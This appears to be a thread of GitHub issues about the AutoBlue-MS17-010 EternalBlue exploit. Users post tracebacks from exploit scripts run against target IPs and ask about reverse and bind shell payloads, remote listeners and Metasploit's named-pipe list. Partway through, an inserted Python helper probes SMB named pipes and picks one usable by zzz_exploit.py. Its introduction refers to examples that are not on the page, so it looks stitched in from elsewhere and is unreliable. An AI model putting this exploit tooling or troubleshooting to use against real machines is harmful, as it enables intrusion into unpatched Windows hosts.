File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2642, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2506, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 996, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer

Support more named pipes?

Metasploit uses the following list of named pipes:

netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd

Would it make sense to add support for all of these named pipes?

The reason I ask is because I received the following output when running eternalblue_checker.py:

Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
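The pipe listings on this page all come from the same probe: open each candidate pipe on the IPC$ tree and record the NTSTATUS. An "Ok" means zzz_exploit.py can use that pipe anonymously, STATUS_ACCESS_DENIED means the pipe exists but the null session was refused (credentials would be needed, as in the RELEVANT/Bill example above), and STATUS_OBJECT_NAME_NOT_FOUND means the service behind it is not running. The block below is an added example, not the project's checker, that runs Metasploit's longer pipe list through that logic; the probe callback, the parser for pasted checker output and the impacket adapter (nt_create_andx / close / SessionError, not exercised offline) are assumptions for illustration.

```python
# NTSTATUS names exactly as eternalblue_checker.py prints them in the listings above
PIPE_OK = "Ok"
ACCESS_DENIED = "STATUS_ACCESS_DENIED"
NOT_FOUND = "STATUS_OBJECT_NAME_NOT_FOUND"

# Metasploit's named-pipe list from the post above, in the same order
METASPLOIT_PIPES = [
    "netlogon", "lsarpc", "samr", "browser", "atsvc", "DAV RPC SERVICE",
    "epmapper", "eventlog", "InitShutdown", "keysvc", "lsass",
    "LSM_API_service", "ntsvcs", "plugplay", "protected_storage", "router",
    "SapiServerPipeS-1-5-5-0-70123", "scerpc", "srvsvc", "tapsrv", "trkwks",
    "W32TIME_ALT", "wkssvc", "PIPE_EVENTROOT\\CIMV2SCM EVENT PROVIDER",
    "db2remotecmd",
]


def probe_pipes(open_pipe, pipes=METASPLOIT_PIPES):
    """Try every pipe and record the result, in probing order.

    open_pipe(name) must return PIPE_OK on success or the NTSTATUS name
    ("STATUS_ACCESS_DENIED", ...) on failure.  Order is kept so the first
    usable pipe is reproducible between runs.
    """
    return {name: open_pipe(name) for name in pipes}


def summarize(results):
    """Group probe results by what they mean for the exploit chain."""
    usable = [n for n, s in results.items() if s == PIPE_OK]
    auth_required = [n for n, s in results.items() if s == ACCESS_DENIED]   # exists, null session refused
    absent = [n for n, s in results.items() if s == NOT_FOUND]              # service not running on target
    other = [n for n, s in results.items() if s not in (PIPE_OK, ACCESS_DENIED, NOT_FOUND)]
    return {"usable": usable, "auth_required": auth_required, "absent": absent, "other": other}


def pick_pipe(results):
    """First pipe that opened anonymously (what zzz_exploit.py needs), else None."""
    for name, status in results.items():
        if status == PIPE_OK:
            return name
    return None


def impacket_opener(conn, tid):
    """Adapter for a live impacket smb.SMB connection with an IPC$ tree id.

    Assumed impacket API: conn.nt_create_andx(tid, name), conn.close(tid, fid)
    and smb.SessionError, whose str() has the form seen on this page:
    'SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)'
    """
    from impacket import smb  # imported lazily so the offline demo needs no impacket

    def open_pipe(name):
        try:
            fid = conn.nt_create_andx(tid, "\\" + name)
        except smb.SessionError as e:
            return str(e).split("SessionError: ", 1)[-1].split("(", 1)[0].strip()
        conn.close(tid, fid)
        return PIPE_OK

    return open_pipe


def parse_checker_output(text):
    """Turn the '=== Testing named pipes ===' block of pasted checker output
    into the same name -> status mapping, so logs from this page can be summarised."""
    results = {}
    in_block = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("=== Testing named pipes ==="):
            in_block = True
            continue
        if in_block and ": " in line:
            name, status = line.split(": ", 1)
            results[name] = PIPE_OK if status.startswith("Ok") else status  # "Ok (64 bit)" -> Ok
    return results


# Constructed sample: the Windows 7 listing quoted in the post above
SAMPLE_WIN7 = """Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
"""

if __name__ == "__main__":
    res = parse_checker_output(SAMPLE_WIN7)
    print(summarize(res))
    print("pipe for zzz_exploit.py:", pick_pipe(res))
```

With a live connection, probe_pipes(impacket_opener(conn, tid)) runs the full Metasploit list; a longer list only helps when at least one extra pipe returns Ok, which the all-ACCESS_DENIED Windows 7 listing above would not change, since that result says the null session itself is refused rather than that the pipes are missing.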

Module ImportError

Hello, I have an issue with module name pyasn1.type.univ when running python2 and module name impacket when running python3.

I'm running the eternalblue_exploit7.py file and I don't know why it always shows that error; I am stuck on how to fix the issue. My OS is Kali Linux. Can you help me solve this issue?

$ python eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin                                        1 ⨯
Traceback (most recent call last):
  File "eternalblue_exploit10.py", line 2, in <module>
    from impacket import smb, ntlm
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 49, in <module>
    from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
$ python3 eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin                                       1 ⨯
Traceback (most recent call last):
  File "/home/avv-kali/Documents/Offensive Security/Tools/Exploitation/AutoBlue-MS17-010/eternalblue_exploit10.py", line 2, in <module>
    from impacket import smb, ntlm
ModuleNotFoundError: No module named 'impacket'

Running the listener on a separate host

Hi,

I'm doing my pentesting via a locally installed Pi that offers an OpenVPN connection for me. The Pi is in the LAN of the client and I use that in combination with a Kali install that connects via VPN.

I don't think I can compile the shellcode on the Pi, so I did that on Kali. I cannot start the listener on Kali, however, because it has no IP on the client's LAN. It has a TUN interface in another range.

Can the code be changed so I can use a listener on another host?

Cheers,

BC

Bind Shell

I'd like to know how to generate bind shell payload, please.

User shell_prep Error

If I run shell_prep.sh I get a compilation error

```
./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
eternalblue_kshellcode_x64.asm: fatal: unable to open output file sc_x64_kernel.bin'
```

but if I run shell_prep.sh with sudo permissions it does not give me problems

```
sudo ./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
n
Okay cool, make sure you merge your own shellcode properly :)
DONE
```

TypeError: can't concat str to bytes

Hello, what's wrong with this? My Python is 3.7.2, and my impacket is the latest.

(py3) C:\Users\admin\Downloads\AutoBlue-MS17-010-master>python zzz_exploit.py test:[email protected]
[*] Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
  File "zzz_exploit.py", line 1112, in <module>
    main()
  File "zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
  File "zzz_exploit.py", line 469, in exploit_matched_pairs
    info.update(leak_frag_size(conn, tid, fid))
  File "zzz_exploit.py", line 313, in leak_frag_size
    req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
  File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 375, in create_nt_trans_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 83, in _put_trans_data
    transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes

Issue with shellcode compiler

Hi, thank you so much for sharing the repo.
I have an issue with generating a reverse shell with msfvenom using the shellcode compiler. The compiler shows this syntax error regardless of whether I respond with 'y' or 'n'.
May I know how can I fix this?

